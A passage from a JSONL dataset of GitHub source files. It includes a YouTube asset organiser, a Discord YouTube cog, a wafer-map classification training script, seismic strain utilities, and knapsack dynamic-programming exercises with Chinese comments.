>\")\r\n if name == '':\r\n name = filename\r\n else:\r\n name = f\"{name}.{file_ext}\"\r\n type = self.getAssetType()\r\n desc = input(\"\\nDescription:\\n\")\r\n attr = input(\"Attribution:\\n\")\r\n\r\n print(f'''\\nPlease Confirm information\r\n Name: {name}\\n\r\n Type: {type}\\n\r\n Desc: {desc}\\n\r\n Attr: {attr}\\n''')\r\n y_n = input(\"(y/n)\")\r\n if y_n != 'y':\r\n return\r\n\r\n id = self.db.importToDatabase(name, type, desc, attr)\r\n if id is None:\r\n return\r\n asst = Asset(id, self, name, type, desc, attr, 'g')\r\n savepath = asst.path\r\n del asst\r\n\r\n copyfile(path, savepath)\r\n print(\"Successfully added to database\")\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def databaseToProject(self):\r\n assets = self.db.get_general_assets()\r\n print(\"Available General Assets >\", [x for x in assets])\r\n name = input(\"> \")\r\n if name not in assets:\r\n print(f\"{name} not in general assets\")\r\n return\r\n\r\n print(assets[name])\r\n asset_id = assets[name][1]\r\n type = assets[name][2]\r\n desc = assets[name][3]\r\n attr = assets[name][4]\r\n asst = Asset(asset_id, self, name, type, desc, attr, 'g')\r\n path = asst.path\r\n self.activeProject.assets[name] = asst\r\n\r\n success = self.db.importFromDatabase(asset_id, self.activeProject.id)\r\n if success is None:\r\n return\r\n\r\n dest = os.path.join(folders['Active'])\r\n for thing in folders[type]:\r\n dest = os.path.join(dest, thing)\r\n dest = os.path.join(dest, name)\r\n\r\n copyfile(path, dest)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def getAttribution(self):\r\n if len(self.projects) < 1:\r\n print(\"\\n There are no projects available\")\r\n return\r\n\r\n attr_path = os.path.join(folders['Active'], 'Attributions.txt')\r\n\r\n with open(attr_path, 'w', encoding='utf-8') as f:\r\n for asset in self.activeProject.assets:\r\n asst = self.activeProject.assets[asset]\r\n if asst.attr != 'None':\r\n f.write(f'\\n{asst.name} \\n')\r\n f.write(f'{asst.attr}\\n\\n')\r\n\r\n def deleteAsset(self, name):\r\n if name not in self.activeProject.assets:\r\n print(f\"\\n{name} not in Assets \\n\")\r\n return\r\n\r\n asst = self.activeProject.assets[name]\r\n success = self.db.deleteAsset(asst.id, asst.gp)\r\n if not success:\r\n return\r\n self.activeProject.assets.pop(name)\r\n deleteFile(asst.path)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def removeAsset(self, name):\r\n if name not in self.activeProject.assets:\r\n print(f\"\\n{name} not in Assets\\n\")\r\n return\r\n\r\n asst = self.activeProject.assets[name]\r\n\r\n success = self.db.removeAsset(asst.id, self.activeProject.id)\r\n if not success:\r\n return\r\n self.activeProject.assets.pop(name)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def getAssetType(self):\r\n while 1:\r\n type = input('\\nFile type (mu,sf, sp, vf,vi, f)>')\r\n if type in asset_type:\r\n return asset_type[type]\r\n\r\n def loop(self):\r\n while 1:\r\n command = input(\"\\nCmd> \")\r\n\r\n if command == 'exit':\r\n break\r\n elif command == 'crp':\r\n prj = input(\"\\nProject Name > \")\r\n self.createProject(prj)\r\n elif command == 'dlp':\r\n print([x for x in self.projects])\r\n name = input(\"Project Name > \")\r\n self.deleteProject(name)\r\n elif command == 'dla':\r\n print(self.activeProject.assets)\r\n name = input(\"Name > \")\r\n self.deleteAsset(name)\r\n elif command == 'dlu':\r\n y_n = input(f\"\\n Are you sure you want to delete User: {self.user[0]}?? 
(y/n)\")\r\n if y_n == 'y':\r\n self.deleteUser()\r\n elif command == 'crap':\r\n self.addAsset()\r\n elif command == 'clap':\r\n self.loadAssets()\r\n elif command == 'ga':\r\n self.getAttribution()\r\n elif command == 'rma':\r\n print(f'Available assets: ', [self.activeProject.assets[x].name for x in self.activeProject.assets if self.activeProject.assets[x].gp == 'g'])\r\n name = input(\"Asset name > \")\r\n self.removeAsset(name)\r\n elif command == 'lp':\r\n print(self.projects)\r\n prj = input(\"Project Name: > \")\r\n self.loadProject(prj)\r\n elif command == 'atd':\r\n self.assetToDatabase()\r\n elif command == 'dtp':\r\n self.databaseToProject()\r\n\r\n\r\nif __name__ == '__main__':\r\n prog = ProjectOrganiser()\r\n","repo_name":"IkeAnanaba/YoutubeFileOrganiser-V1.0","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"13141286904","text":"import logging\nLOGGER = logging.getLogger(__name__)\n\nimport time\n\nfrom .config import *\n\nclass Timer():\n\n def __init__(self, engine):\n\n self.engine = engine\n self.start_time = self.engine.current_time\n\n def reset(self):\n\n self.start_time = self.engine.current_time\n\n def wait(self, duration, mode):\n\n if mode[0] == 'b':\n duration = duration * 60. / self.engine.tempo\n duration *= 1000000000 # s to ns\n elif mode[0] == 's':\n duration *= 1000000000 # s to ns\n elif mode == 'ns':\n pass\n else:\n LOGGER.error('unrecognized mode \"%s\" for wait()' % mode)\n return\n\n\n while self.engine.current_time - self.start_time < duration:\n time.sleep(MAINLOOP_PERIOD)\n\n self.start_time += duration\n\n def wait_next_cycle(self):\n\n cycle_duration = 1000000000 * self.engine.cycle_length * 60 / self.engine.tempo\n elapsed_time = (self.engine.current_time - self.engine.cycle_start_time)\n time_before_next_cycle = cycle_duration - elapsed_time % cycle_duration\n\n self.wait(time_before_next_cycle, 'ns')\n","repo_name":"Houston4444/mentat","sub_path":"mentat/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"30245635862","text":"\"\"\"\r\nMIT License\r\nCopyright (c) 2020 GamingGeek\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software\r\nand associated documentation files (the \"Software\"), to deal in the Software without restriction, \r\nincluding without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, \r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, \r\nsubject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF \r\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE \r\nFOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION \r\nWITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n\"\"\"\r\n\r\nimport discord\r\nfrom discord.ext import commands\r\nfrom fire.filters.youtube import findvideo\r\nfrom fire.http import Route\r\nfrom jishaku.paginators import WrappedPaginator, PaginatorEmbedInterface\r\nfrom jishaku.cog import Jishaku\r\nimport googleapiclient.discovery\r\nimport functools\r\nimport datetime\r\nimport json\r\n\r\n\r\nclass YouTube(commands.Cog, name=\"YouTube API\"):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.youtube = googleapiclient.discovery.build(\r\n 'youtube', 'v3', developerKey=bot.config['youtube']\r\n )\r\n self.loop = bot.loop\r\n\r\n def popular(self):\r\n request = self.youtube.videos().list(\r\n part=\"snippet,contentDetails,statistics\",\r\n chart=\"mostPopular\",\r\n maxResults=5,\r\n regionCode=\"US\"\r\n )\r\n response = request.execute()\r\n videos = []\r\n for video in response.get(\"items\", []):\r\n videos.append(video)\r\n return videos\r\n\r\n async def apopular(self):\r\n params = {\r\n 'part': 'snippet,contentDetails,statistics',\r\n 'chart': 'mostPopular',\r\n 'maxResults': '5',\r\n 'regionCode': 'US'\r\n }\r\n route = Route(\r\n 'GET',\r\n '/videos',\r\n )\r\n response = await self.bot.http.youtube.request(route, params=params)\r\n videos = [v for v in response.get('items', [])]\r\n return videos\r\n\r\n def video_info(self, vid):\r\n request = self.youtube.videos().list(\r\n part=\"snippet,contentDetails,statistics\",\r\n id=vid\r\n )\r\n response = request.execute()\r\n return response\r\n\r\n async def avideo_info(self, vid: str):\r\n params = {\r\n 'part': 'snippet,contentDetails,statistics',\r\n 'id': vid\r\n }\r\n route = Route(\r\n 'GET',\r\n '/videos',\r\n )\r\n response = await self.bot.http.youtube.request(route, params=params)\r\n return [v for v in response.get('items', [])]\r\n\r\n def channel_info(self, channel):\r\n if channel.startswith('UC'):\r\n request = self.youtube.channels().list(\r\n part=\"snippet,contentDetails,statistics\",\r\n id=channel\r\n )\r\n else:\r\n request = self.youtube.channels().list(\r\n part=\"snippet,statistics\",\r\n forUsername=channel\r\n )\r\n response = request.execute()\r\n return response\r\n\r\n async def achannel_info(self, channel: str):\r\n params = {\r\n 'part': 'snippet,contentDetails,statistics'\r\n }\r\n if channel.startswith('UC'):\r\n params.update({'id': channel})\r\n else:\r\n params.update({'forUsername': channel})\r\n route = Route(\r\n 'GET',\r\n '/channels',\r\n )\r\n response = await self.bot.http.youtube.request(route, params=params)\r\n return response\r\n\r\n @commands.group(name=\"yt\", aliases=['youtube'], description='YouTube commands.')\r\n async def yt(self, ctx):\r\n if ctx.invoked_subcommand:\r\n return\r\n try:\r\n videos = await self.apopular()\r\n except Exception:\r\n return await ctx.error('Failed to get trending videos.')\r\n embed = discord.Embed(title=\"Trending on YouTube (US)\", color=ctx.author.color,\r\n timestamp=datetime.datetime.now(datetime.timezone.utc))\r\n for video in videos:\r\n title = video['snippet']['title']\r\n vid = video['id']\r\n author = video['snippet']['channelTitle']\r\n authorid = video['snippet']['channelId']\r\n published = video['snippet']['publishedAt'].replace('T', ' ').split('.')[\r\n 0]\r\n duration = 
video['contentDetails']['duration'].replace('PT', '').replace(\r\n 'H', ' Hrs ').replace('M', ' Mins ').replace('S', 'Secs')\r\n views = format(int(video['statistics'].get('viewCount', 0)), ',d')\r\n likes = format(int(video['statistics'].get('likeCount', 0)), ',d')\r\n dislikes = format(\r\n int(video['statistics'].get('dislikeCount', 0)), ',d')\r\n comments = format(\r\n int(video['statistics'].get('commentCount', 0)), ',d')\r\n embed.add_field(name=video[\"snippet\"][\"title\"],\r\n value=f\"» Link: [{title}](https://youtu.be/{vid} 'Click here to watch the video')\\n» Author: [{author}](https://youtube.com/channel/{authorid} 'Click here to checkout {author} channel')\\n» Published: {published}\\n» Views: {views}\\n» Likes: {likes}\\n» Dislikes: {dislikes}\\n» Comments: {comments}\", inline=False)\r\n await ctx.send(embed=embed)\r\n\r\n @yt.command(name=\"info\", description=\"Retrieve info from a video URL or ID\")\r\n async def info(self, ctx, video: str):\r\n video = findvideo(video) or video\r\n try:\r\n videoinfo = await self.avideo_info(video)\r\n videoinfo = videoinfo[0]\r\n except Exception:\r\n return await ctx.error(f'Failed to fetch video. Ensure the id/url is correct.')\r\n title = videoinfo['snippet']['title']\r\n vid = videoinfo['id']\r\n author = videoinfo['snippet']['channelTitle']\r\n authorid = videoinfo['snippet']['channelId']\r\n published = videoinfo['snippet']['publishedAt'].replace('T', ' ').split('.')[\r\n 0]\r\n duration = videoinfo['contentDetails']['duration'].replace('PT', '').replace(\r\n 'H', ' Hrs ').replace('M', ' Mins ').replace('S', 'Secs')\r\n description = videoinfo['snippet']['description']\r\n paginator = WrappedPaginator(\r\n prefix='```\\nDescription (Use controls to change page)\\n', suffix='```', max_size=1895)\r\n for line in description.split('\\n'):\r\n paginator.add_line(line)\r\n views = format(\r\n int(videoinfo.get('statistics', {}).get('viewCount', 0)), ',d')\r\n likes = format(\r\n int(videoinfo.get('statistics', {}).get('likeCount', 0)), ',d')\r\n dislikes = format(\r\n int(videoinfo.get('statistics', {}).get('dislikeCount', 0)), ',d')\r\n comments = format(\r\n int(videoinfo.get('statistics', {}).get('commentCount', 0)), ',d')\r\n embed = discord.Embed(\r\n title=f\"Video info for {video}\", color=ctx.author.color, timestamp=datetime.datetime.now(datetime.timezone.utc))\r\n embed.add_field(name=videoinfo[\"snippet\"][\"title\"],\r\n value=f\"» Link: [{title}](https://youtu.be/{vid} 'Click here to watch the video')\\n» Author: [{author}](https://youtube.com/channel/{authorid} 'Click here to checkout {author} channel')\\n» Published: {published}\\n» Views: {views}\\n» Likes: {likes}\\n» Dislikes: {dislikes}\\n» Comments: {comments}\", inline=False)\r\n interface = PaginatorEmbedInterface(\r\n ctx.bot, paginator, owner=ctx.author, _embed=embed)\r\n return await interface.send_to(ctx)\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(YouTube(bot))\r\n bot.logger.info(f'$GREENLoaded YouTube cog!')\r\n","repo_name":"0xacn/bot","sub_path":"cogs/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"35535106509","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nimport torch\nimport numpy as np\n\nfrom datasets.wm811k import WM811K\nfrom datasets.transforms import WM811KTransform\n\nfrom configs.task_configs import ClassificationConfig\nfrom configs.network_configs import ALEXNET_BACKBONE_CONFIGS\nfrom 
configs.network_configs import VGGNET_BACKBONE_CONFIGS\nfrom configs.network_configs import RESNET_BACKBONE_CONFIGS\nfrom models.alexnet import AlexNetBackbone\nfrom models.vggnet import VggNetBackbone\nfrom models.resnet import ResNetBackbone\nfrom models.head import LinearClassifier\n\nfrom tasks.classification import Classification\n\nfrom utils.loss import LabelSmoothingLoss\nfrom utils.logging import get_logger\nfrom utils.metrics import MultiAccuracy, MultiF1Score\nfrom utils.optimization import get_optimizer, get_scheduler\n\n\nAVAILABLE_MODELS = {\n 'alexnet': (ALEXNET_BACKBONE_CONFIGS, AlexNetBackbone),\n 'vggnet': (VGGNET_BACKBONE_CONFIGS, VggNetBackbone),\n 'resnet': (RESNET_BACKBONE_CONFIGS, ResNetBackbone),\n}\n\n\ndef main():\n \"\"\"Main function.\"\"\"\n\n # Configurations\n config = ClassificationConfig.parse_arguments()\n os.environ['CUDA_VISIBLE_DEVICES'] = ','.join([str(gpu) for gpu in config.gpus])\n num_gpus_per_node = len(config.gpus)\n world_size = config.num_nodes * num_gpus_per_node\n distributed = world_size > 1\n setattr(config, 'num_gpus_per_node', num_gpus_per_node)\n setattr(config, 'world_size', world_size)\n setattr(config, 'distributed', distributed)\n config.save()\n\n if config.distributed:\n raise NotImplementedError\n else:\n main_worker(0, config=config) # single machine, single gpu\n\n\ndef main_worker(local_rank: int, config: object):\n\n torch.cuda.set_device(local_rank)\n if config.distributed:\n raise NotImplementedError\n\n if local_rank == 0:\n logfile = os.path.join(config.checkpoint_dir, 'main.log')\n logger = get_logger(stream=False, logfile=logfile)\n else:\n logger = None\n\n in_channels = int(config.decouple_input) + 1\n num_classes = 9\n\n # 2. Dataset\n train_transform = WM811KTransform(size=config.input_size, mode=config.augmentation)\n test_transform = WM811KTransform(size=config.input_size, mode='test')\n train_set = WM811K('./data/wm811k/labeled/train/',\n transform=train_transform,\n proportion=config.label_proportion,\n decouple_input=config.decouple_input)\n valid_set = WM811K('./data/wm811k/labeled/valid/',\n transform=test_transform,\n decouple_input=config.decouple_input)\n test_set = WM811K('./data/wm811k/labeled/test/',\n transform=test_transform,\n decouple_input=config.decouple_input)\n\n # 3. Model\n BACKBONE_CONFIGS, Backbone = AVAILABLE_MODELS[config.backbone_type]\n backbone = Backbone(BACKBONE_CONFIGS[config.backbone_config], in_channels=in_channels)\n classifier = LinearClassifier(in_channels=backbone.out_channels, num_classes=num_classes)\n\n # 3-1. Load pre-trained weights (if provided)\n if config.pretrained_model_file is not None:\n try:\n backbone.load_weights_from_checkpoint(path=config.pretrained_model_file, key='backbone')\n except KeyError:\n backbone.load_weights_from_checkpoint(path=config.pretrained_model_file, key='encoder')\n finally:\n if logger is not None:\n logger.info(f\"Loaded pre-trained model from: {config.pretrained_model_file}\")\n else:\n if logger is not None:\n logger.info(\"No pre-trained model provided.\")\n\n # 3-2. Finetune or freeze weights of backbone\n if config.freeze:\n backbone.freeze_weights()\n if logger is not None:\n logger.info(\"Freezing backbone weights.\")\n\n\n # 4. 
Optimization\n params = [{'params': backbone.parameters()}, {'params': classifier.parameters()}]\n optimizer = get_optimizer(\n params=params,\n name=config.optimizer,\n lr=config.learning_rate,\n weight_decay=config.weight_decay,\n momentum=config.momentum\n )\n scheduler = get_scheduler(\n optimizer=optimizer,\n name=config.scheduler,\n epochs=config.epochs,\n warmup_steps=config.warmup_steps\n )\n\n # 5. Experiment (classification)\n experiment_kwargs = {\n 'backbone': backbone,\n 'classifier': classifier,\n 'optimizer': optimizer,\n 'scheduler': scheduler,\n 'loss_function': LabelSmoothingLoss(num_classes, smoothing=config.label_smoothing),\n 'distributed': config.distributed,\n 'local_rank': local_rank,\n 'checkpoint_dir': config.checkpoint_dir,\n 'write_summary': config.write_summary,\n 'metrics': {\n 'accuracy': MultiAccuracy(num_classes=num_classes),\n 'f1': MultiF1Score(num_classes=num_classes, average='macro'),\n },\n }\n experiment = Classification(**experiment_kwargs)\n\n # 6. Run (classification)\n run_kwargs = {\n 'train_set': train_set,\n 'valid_set': valid_set,\n 'test_set': test_set,\n 'epochs': config.epochs,\n 'batch_size': config.batch_size,\n 'num_workers': config.num_workers,\n 'logger': logger,\n }\n experiment.run(**run_kwargs)\n logger.handlers.clear()\n\n\nif __name__ == '__main__':\n\n np.random.seed(0)\n torch.manual_seed(0)\n torch.backends.cudnn.benchmark = True\n try:\n main()\n except KeyboardInterrupt:\n sys.exit(0)\n","repo_name":"hgkahng/WaPIRL","sub_path":"run_classification.py","file_name":"run_classification.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"79"} +{"seq_id":"36291833189","text":"# You are given two linked lists representing two non-negative numbers.\n# The digits are stored in reverse order and each of their nodes contain\n# a single digit.\n# Add the two numbers and return it as a linked list.\n#\n# Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)\n# Output: 7 -> 0 -> 8\n#\n# Definition for singly-linked list.\n# Time: O(n)\n# Space: O(1)\n\nimport argparse\nfrom model import ListNode\nfrom helper import get_linked_list_from_list\n\n\nclass Solution(object):\n @staticmethod\n def add_two_numbers(l1, l2):\n dummy = ListNode(0)\n current, carry = dummy, 0\n\n while l1 or l2:\n val = carry\n if l1:\n val += l1.val\n l1 = l1.next\n if l2:\n val += l2.val\n l2 = l2.next\n carry, val = divmod(val, 10)\n current.next = ListNode(val)\n current = current.next\n\n if carry == 1:\n current.next = ListNode(1)\n\n return dummy.next\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--first', dest='first', required=True, nargs='+',\n help='list of integer', type=int)\n parser.add_argument('--second', dest='second', required=True, nargs='+',\n help='list of integer', type=int)\n args = parser.parse_args()\n\n first = get_linked_list_from_list(args.first)\n second = get_linked_list_from_list(args.second)\n print(Solution().add_two_numbers(first, second))\n","repo_name":"ericdong66/leetcode-50","sub_path":"python/21.add_two_numbers.py","file_name":"21.add_two_numbers.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8689495621","text":"import numpy as np\nfrom math import exp\n\n\ndef moment_function(magnitude):\n '''\n Get moment (in Nm) from magnitude using Hanks & Kanamori (1979)\n\n :param float (or numpy.ndarray) 
magnitude:\n        Magnitude of event\n    :returns:\n        Seismic Moment in Nm\n    '''\n    return 10. ** ((1.5 * magnitude) + 9.05)\n\n\ndef moment_magnitude_function(moment):\n    '''\n    For a given moment, get the moment magnitude using the formula\n    of Hanks & Kanamori (1979)\n\n    :param float or numpy.ndarray moment:\n        Seismic moment in Nm\n    '''\n\n    return (2. / 3.) * (np.log10(moment) - 9.05)\n\n\ndef calculate_taper_function(obs_threshold_moment, sel_threshold_moment,\n                             corner_moment, beta):\n    '''\n    Calculates the tapering function of the tapered Gutenberg & Richter model:\n    as described in Bird & Liu (2007)::\n\n        taper_function = (M_0(M_T) / M_0(M_T^{CMT}))^-beta x exp((M_0(m_T^CMT) -\n        M_0(m_T)) / M_0(m_c))\n\n    :param numpy.ndarray obs_threshold_moment:\n        Moment of the threshold magnitude of the observed earthquake catalogue\n    :param numpy.ndarray sel_threshold_moment:\n        Moment of the target magnitude\n    :param float corner_moment:\n        Corner moment of the Tapered Gutenberg-Richter Function\n    :param float beta:\n        Beta value (b * ln(10.)) of the Tapered Gutenberg-Richter Function\n    :returns:\n        Relative moment rate\n    '''\n    argument = (obs_threshold_moment - sel_threshold_moment) /\\\n        corner_moment\n    if argument < -100.0:\n        g_function = 0.0\n    else:\n        g_function = ((sel_threshold_moment / obs_threshold_moment) **\n                      -beta) * exp(argument)\n    return g_function\n\n\ndef tapered_gutenberg_richter_cdf(moment, moment_threshold, beta,\n                                  corner_moment):\n    '''\n    Tapered Gutenberg-Richter Cumulative Distribution Function\n\n    :param float or numpy.ndarray moment:\n        Moment for calculation of rate\n\n    :param float or numpy.ndarray moment_threshold:\n        Threshold Moment of the distribution (moment rate essentially!)\n\n    :param float beta:\n        Beta value (b * ln(10.)) of the Tapered Gutenberg-Richter Function\n\n    :param float corner_moment:\n        Corner moment of the Tapered Gutenberg-Richter Function\n\n    :returns:\n        Cumulative probability of moment release > moment\n\n\n    '''\n    cdf = np.exp((moment_threshold - moment) / corner_moment)\n    return ((moment / moment_threshold) ** (-beta)) * cdf\n\n\ndef tapered_gutenberg_richter_pdf(moment, moment_threshold, beta,\n                                  corner_moment):\n    '''\n    Tapered Gutenberg-Richter Probability Density Function\n\n    :param float or numpy.ndarray moment:\n        Moment for calculation of rate\n\n    :param float or numpy.ndarray moment_threshold:\n        Threshold Moment of the distribution (moment rate essentially!)\n\n    :param float beta:\n        Beta value (b * ln(10.)) of the Tapered Gutenberg-Richter Function\n\n    :param float corner_moment:\n        Corner moment of the Tapered Gutenberg-Richter Function\n\n    :returns:\n        Absolute probability of moment release > moment\n    '''\n    return ((beta / moment + 1. 
/ corner_moment) *\n tapered_gutenberg_richter_cdf(moment, moment_threshold, beta,\n corner_moment))\n","repo_name":"gem/oq-engine","sub_path":"openquake/hmtk/strain/strain_utils.py","file_name":"strain_utils.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"79"} +{"seq_id":"24638766712","text":"# · Backpack可行性背包\n# – 题面:要求不超过Target时能拼出的最大重量\n# – 记录f[i][w]=前i个物品能不能拼出重量w 14公斤\n# • BackpackV,BackpackVI,计数型背包\n# – 题面:要求有多少种方式拼出重量Target\n# – 记录f[i][w]=前i个物品有多少种方式拼出重量w\n# • BackpackII,BackpackIII,最值型背包\n# – 题面:要求能拼出的最大价值\n# – 记录f[i][w]=前i个/种物品拼出重量w能得到的最大价值\n# • 关键点\n# – 最后一步\n# • 最后一个背包内的物品是哪个 • 最后一个物品有没有进背包\n# – 数组大小和最大承重Target有关\n\n# 背包问题中,dp数组的大小跟背包总承重有关\n# 题1, 题2中,A数组中元素的顺序是重要的,问题转化是:An放不放进背包\n# 题3中, A数组中元素的顺序已经不重要了, 因为你可以重复使用元素,这是要考虑的是最后一个放进背包的元素是谁(硬币组合问题)\n\n# 题1 背包问题\n# 记录前i个物品能拼出哪些重量:1 等于前i-1个物品能拼出的重量 2 前i-1个物品能拼出的重量 + 第i个物品重量\nclass Solution:\n \"\"\"\n @param m: An integer m denotes the size of a backpack\n @param A: Given n items with size A[i]\n @return: The maximum size\n \"\"\"\n def backPack(self, m, A):\n n = len(A)\n if n == 0:\n return 0 \n \n dp = [[None for _ in range(m+1) ] for _ in range(n+1)] # 注意 m+1 n+1\n dp[0][0] = True\n \n for i in range(1, m+1):\n dp[0][i] = False\n \n for i in range(1, n+1):\n for j in range(0, m+1): # 从0开始\n dp[i][j] = dp[i-1][j] \n if j >= A[i-1]: # 一定要记住 j >= A[i-1], 不然j-A[i-1]就越界了。其实就是想拼出10kg, 如果A[i-1]=11kg, 那么A[i-1]就不能入选了。\n dp[i][j] = dp[i][j] or dp[i-1][j - A[i-1]]\n res = 0 \n for i in range(m, -1, -1):\n if dp[n][i] == True:\n res = i\n break\n return res\n \n # 背包问题 II\n# 背包问题 III\n# 原始方法(超时)- 时间优化 - 空间优化\n# 方法一:f[i][w] = max{f[i-1][w], f[i-1][w-Ai-1] + Vi-1, f[i-1][w-2Ai-1] + 2Vi-1,...}\nclass Solution:\n \"\"\"\n @param A: an integer array\n @param V: an integer array\n @param m: An integer\n @return: an array\n \"\"\"\n def backPackIII(self, A, V, m):\n # write your code here\n # f[i]f[j] = f[i-1][j]\n n = len(A)\n f = [[0 for _ in range(m+1)] for _ in range(n+1)]\n for x in range(1, m+1):\n f[0][x] = -1\n \n for i in range(1, n+1):\n for j in range(1, m+1):\n f[i][j] = f[i-1][j]\n k = 1\n while j >= k*A[i-1]:\n if f[i-1][j-k*A[i-1]] != -1:\n f[i][j] = max(f[i][j], f[i-1][j - k * A[i-1]] + k * V[i-1])\n \n k += 1 # 注意k不可以在if里面,不然的话k无法向后循环,后面可能还有k符合条件,但是无法到达那个k\n return max(f[n])\n \n \n# 方法二:f[i][w] = max{f[i-1][w], f[i][w-Ai-1] + Vi-1}\n# 因为这一坨 f[i-1][w-Ai-1] + Vi-1, f[i-1][w-2Ai-1] + 2Vi-1,...已经在前面算过了,就是求f[i][w-Ai-1] + Vi-1的时候, \n# f[i][w-Ai-1] + Vi-1在f[i][w] 同一行靠前面,中间差着Ai-1, 所以为了避免重复计算,时间优化,所以用f[i][w-Ai-1] + Vi-1 取代那一坨\nclass Solution:\n \"\"\"\n @param A: an integer array\n @param V: an integer array\n @param m: An integer\n @return: an array\n \"\"\"\n def backPackIII(self, A, V, m):\n # write your code here\n # f[i]f[j] = f[i-1][j]\n n = len(A)\n f = [[0 for _ in range(m+1)] for _ in range(n+1)]\n for x in range(1, m+1):\n f[0][x] = -1\n \n for i in range(1, n+1):\n for j in range(1, m+1):\n f[i][j] = f[i-1][j]\n if j >= A[i-1] and f[i][j-A[i-1]] != -1:\n f[i][j] = max(f[i][j], f[i][j - A[i-1]] + V[i-1])\n \n \n return max(f[n])\n# 方法三: \n# 空间优化:一维数组\nclass Solution:\n \"\"\"\n @param A: an integer array\n @param V: an integer array\n @param m: An integer\n @return: an array\n \"\"\"\n def backPackIII(self, A, V, m):\n # write your code here\n # f[i]f[j] = f[i-1][j]\n n = len(A)\n f = [0 for _ in range(m+1)]\n \n \n for i in range(1, n+1):\n for j in range(A[i-1],m+1):\n f[j] = max(f[j-A[i-1]] + V[i-1], f[j])\n return f[m]\n \n# 背包问题 
IV\n\n# Problem 2: Backpack Problem V\n# Solution 1: 2-D rolling array\nclass Solution:\n    \"\"\"\n    @param nums: an integer array and all positive numbers\n    @param target: An integer\n    @return: An integer\n    \"\"\"\n    def backPackV(self, nums, target):\n        n = len(nums)\n        if n == 0:\n            return 0 \n        \n        dp = [[0 for _ in range(target+1)] for _ in range(2)]\n        dp[0][0] = 1 \n        \n        \n        for i in range(1, n+1):\n            for j in range(target+1):\n                dp[i%2][j] = dp[(i-1)%2][j]\n                if j >= nums[i-1]:\n                    dp[i%2][j] = dp[i%2][j] + dp[(i-1)%2][j - nums[i-1]]\n        \n        return dp[n%2][target]\n    \n# Solution 2: 1-D rolling array + iterate back to front [old values from earlier positions are still needed; updating front to back would overwrite those old values with new ones]\nclass Solution:\n    \"\"\"\n    @param nums: an integer array and all positive numbers\n    @param target: An integer\n    @return: An integer\n    \"\"\"\n    def backPackV(self, nums, target):\n        n = len(nums)\n        if n == 0:\n            return 0 \n        \n        dp = [0 for _ in range(target+1)]\n        dp[0] = 1 \n        \n        \n        for i in range(1, n+1):\n            for j in range(target, -1, -1):\n                if j >= nums[i-1]:\n                    dp[j] += dp[j - nums[i-1]]\n        \n        return dp[target]\n# Problem 3: Backpack Problem VI \n# numbers can be reused, and different orders count as different combinations (this becomes the coin-combination problem)\nclass Solution:\n    \"\"\"\n    @param nums: an integer array and all positive numbers, no duplicates\n    @param target: An integer\n    @return: An integer\n    \"\"\"\n    def backPackVI(self, nums, target):\n        n = len(nums)\n        if n == 0:\n            return 0 \n        f = [0] * (target+1) \n        f[0] = 1 \n        for i in range(1, target+1):\n            for j in range(n):\n                if i >= nums[j]:\n                    f[i] += f[i - nums[j]]\n        \n        return f[target]\n","repo_name":"MERCURYCOA/Algo","sub_path":"DP-背包型.py","file_name":"DP-背包型.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13371957259","text":"# encoding: utf-8\n\"\"\"\n    drive.keys\n    ~~~~~~~~~~\n\n    This file contains the keys used by :package:`drive`.\n\"\"\"\n\nk_bootstrap_code = 'bootstrap_code'\nk_MBR = 'MBR'\nk_Partition = 'Partition'\nk_PartitionEntry = 'PartitionEntry'\nk_PartitionEntries = 'PartitionEntries'\nk_status = 'status'\n\nk_starting_chs_address = 'starting_chs_address'\nk_ignored = '__ignored__'\nk_partition_type = 'partition_type'\nk_ending_chs_address = 'ending_chs_address'\nk_first_sector_address = 'first_sector_address'\nk_first_byte_address = 'first_byte_address'\nk_number_of_sectors = 'number_of_sectors'\nk_size = 'size'\n\nk_boot_signature = 'boot_signature'\n\nk_FAT32BootSector = 'FAT32BootSector'\nk_jump_instruction = 'jump_instruction'\nk_OEM_name = 'OEM_name'\nk_bytes_per_sector = 'bytes_per_sector'\nk_sectors_per_cluster = 'sectors_per_cluster'\nk_number_of_reserved_sectors = 